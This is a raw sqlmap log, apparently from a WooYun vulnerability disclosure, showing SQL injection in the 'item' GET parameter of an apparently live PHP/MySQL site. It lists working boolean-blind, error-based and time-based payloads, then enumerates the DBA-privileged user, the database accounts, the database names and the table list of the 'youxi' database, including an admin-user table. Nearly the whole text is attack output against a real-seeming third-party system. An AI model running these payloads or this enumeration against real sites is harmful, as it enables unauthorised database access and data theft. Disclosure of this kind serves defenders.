WooYun.org

[*] starting at 21:33:33
[21:33:33] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: item
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=21&item=15 AND 4670=4670
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: page=21&item=15 AND (SELECT 4333 FROM(SELECT COUNT(*),CONCAT(0x7164
756171,(SELECT (CASE WHEN (4333=4333) THEN 1 ELSE 0 END)),0x7164667971,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page=21&item=15 AND SLEEP(5)
---
[21:33:33] [INFO] testing MySQL
[21:33:33] [WARNING] reflective value(s) found and filtering out
[21:33:33] [INFO] confirming MySQL
[21:33:33] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL >= 5.0.0
[21:33:33] [INFO] fetching current user
[21:33:34] [INFO] retrieved: oct_crop@%
current user:    'oct_crop@%'
[21:33:34] [INFO] fetching current database
[21:33:34] [INFO] retrieved: youxi
current database:    'youxi'
[21:33:34] [INFO] testing if current user is DBA
[21:33:34] [INFO] fetching current user
current user is DBA:    True
database management system users [7]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'oct_crop'@'%'
[*] 'oct_crop'@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
[21:37:33] [INFO] fetching database names
[21:37:33] [INFO] the SQL query used returns 7 entries
[21:37:33] [INFO] retrieved: information_schema
[21:37:33] [INFO] retrieved: mysql
[21:37:33] [INFO] retrieved: octmami
[21:37:34] [INFO] retrieved: performance_schema
[21:37:34] [INFO] retrieved: phpmyadmin
[21:37:34] [INFO] retrieved: test
[21:37:34] [INFO] retrieved: youxi
available databases [7]:
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] phpmyadmin
[*] test
[*] youxi
Database: youxi
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| _bak_oc_shop                    | 408     |
| oc_shop                         | 404     |
| oc_yproduct                     | 403     |
| oc_present_exchange             | 309     |
| oc_product                      | 265     |
| oc_yshop                        | 94      |
| oc_wiki_info                    | 61      |
| oc_product_property             | 59      |
| oc_present_gallery              | 52      |
| oc_module                       | 51      |
| oc_jobs                         | 37      |
| oc_news                         | 34      |
| oc_milestone                    | 21      |
| oc_wiki_sort                    | 20      |
| oc_dee                          | 17      |
| oc_present                      | 17      |
| oc_bbs                          | 15      |
| oc_member                       | 15      |
| oc_video                        | 10      |
| oc_index_ad                     | 7       |
| oc_join_ab                      | 7       |
| oc_lost_card                    | 7       |
| oc_product_sort                 | 7       |
| oc_yproduct_sort                | 5       |
| oc_admin_user                   | 4       |
| oc_uindex_ad                    | 3       |
| oc_join_table                   | 2       |
| oc_sessions                     | 2       |
| oc_contact_us                   | 1       |
| oc_sessions_data                | 1       |
| oc_yproduct_property            | 1       |
+---------------------------------+---------+